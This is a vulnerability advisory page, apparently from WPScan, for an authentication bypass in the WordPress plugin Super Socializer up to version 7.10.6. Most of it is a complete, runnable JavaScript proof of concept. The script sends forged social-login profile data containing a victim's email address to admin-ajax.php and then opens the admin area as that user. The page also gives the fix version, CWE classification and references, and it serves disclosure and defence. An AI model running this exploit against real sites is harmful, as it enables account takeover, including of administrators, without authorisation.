Super Socializer <= 7.10.6 - Authentication Bypass


Description
You can log in to the site as any user if you know that user's email address.
Proof of Concept
// Steps:
// Fill in these 3 variables (site URL, target account e-mail, page nonce).
// NOTE(review): none of these is a secret belonging to the target account. The
// nonce is copied out of the login page source (see below), so it does not
// authenticate the caller; the only per-victim input is the e-mail address.
var url = 'http://my-site.com/wordpress/', //website url. Closing slash required
  email = 'john.doe@my-site.com', //The admin email address to exploit
  nonce = 'e86377d05a'; // View the source of the login page: http://my-site.com/wordpress/wp-login.php and search for `security`. Copy the nonce value here. Ex.: var the_champ_sl_ajax_token = {"ajax_url":"http:\/\/my-site.com\/wordpress\/wp-admin\/admin-ajax.php","security":"e86377d05a"};
// Click on Run in JsFiddle and then click on the Exploit button. It will open a window which first logs you in as the user with the given email address, then loads the admin area, and you will be logged in.

/**
 * PoC driver for the authentication bypass described above.
 *
 * Posts a `the_champ_user_auth` AJAX request to admin-ajax.php whose
 * `profileData[*]` fields are entirely client-chosen: every field is a
 * placeholder except `profileData[email]`, which names the account to log in
 * as. The page states that this alone is enough to be logged in as that user,
 * so the handler presumably trusts the submitted profile rather than data it
 * fetched from the named provider itself — that missing server-side
 * verification is the root cause (CWE-287); fixed in 7.11 per the page.
 *
 * After a fixed 2 s delay the same named window is pointed at wp-admin/ so the
 * resulting session can be observed. Nothing here waits on the POST response;
 * the delay is only a guess at how long the request takes.
 *
 * Reads the page-level `url`, `email` and `nonce` variables and calls
 * `OpenWindowWithPost` (defined below). No return value.
 */
function exploit() {
  // admin-ajax.php dispatches on `action`; `security` carries the nonce that
  // was copied from the login page source.
  var param = {
    action: 'the_champ_user_auth',
    security: nonce,
    'profileData[id]': 'a',   // placeholder values; the page implies only the
    'profileData[link]': 'a', // e-mail field matters to the handler
    'profileData[name]': 'a',
    'profileData[email]': email, // the account to be logged in as
    'profileData[first_name]': 'a',
    'profileData[last_name]': 'a',
    provider: 'facebook',
    redirectionUrl: encodeURI(url)
  };
  // Top-level form POST into a named popup window (see OpenWindowWithPost).
  OpenWindowWithPost(url + "wp-admin/admin-ajax.php",
    "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);


  // Reuse the same window name so the navigation happens in the popup that
  // now holds the session; 2000 ms is an arbitrary wait, not a response check.
  setTimeout(function() {
    window.open(url + "wp-admin/", 'exploit');
  }, 2000);
}

// Wire the PoC to the page's button once the DOM is ready (jQuery; `$(fn)` is
// the shorthand form of `$(document).ready(fn)`).
$(function () {
  $('button').on('click', exploit);
});


/**
 * Submits `params` as an ordinary HTML form POST to `url`, targeted at a
 * window named `name` that is first opened with `windowoption`.
 *
 * A hidden <form> is built from `params` (one hidden input per own property;
 * values are assigned to `input.value` and so are string-coerced), appended to
 * the document body, submitted, and removed again. Because this is a normal
 * top-level form navigation rather than an XHR, the browser handles the
 * response — and any Set-Cookie it carries — in the popup window itself.
 *
 * @param {string} url          form action URL
 * @param {string} windowoption window.open feature string
 * @param {string} name         window name; also used as the form's target
 * @param {Object} params       flat key/value map posted as form fields
 * @returns {Window|null} the handle returned by window.open (null if the
 *   popup was blocked)
 */
function OpenWindowWithPost(url, windowoption, name, params) {
  var form = document.createElement("form");
  form.setAttribute("method", "post");
  form.setAttribute("action", url);
  form.setAttribute("target", name);

  // Only own properties become fields; inherited keys are skipped.
  for (var i in params) {
    if (params.hasOwnProperty(i)) {
      var input = document.createElement('input');
      input.type = 'hidden';
      input.name = i;
      input.value = params[i];
      form.appendChild(input);
    }
  }

  // The form must be in the document before submit() works.
  document.body.appendChild(form);

  // Open the named window first so `windowoption` is applied; the form's
  // target then resolves to this window instead of a default new one.
  var wnd = window.open("", name, windowoption);

  form.submit();

  // The form has served its purpose once submitted; clean up the DOM.
  document.body.removeChild(form);

  return wnd;
}

Affects Plugin

Fixed in version 7.11

References

URL https://jsfiddle.net/5jh37uet/
URL https://plugins.trac.wordpress.org/changeset/1832860/super-socializer

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Views 327
Verified No
WPVDB ID 9043

Timeline

Publicly Published 2018-03-03 (5 months ago)
Added 2018-03-15 (4 months ago)
Last Updated 2018-03-15 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.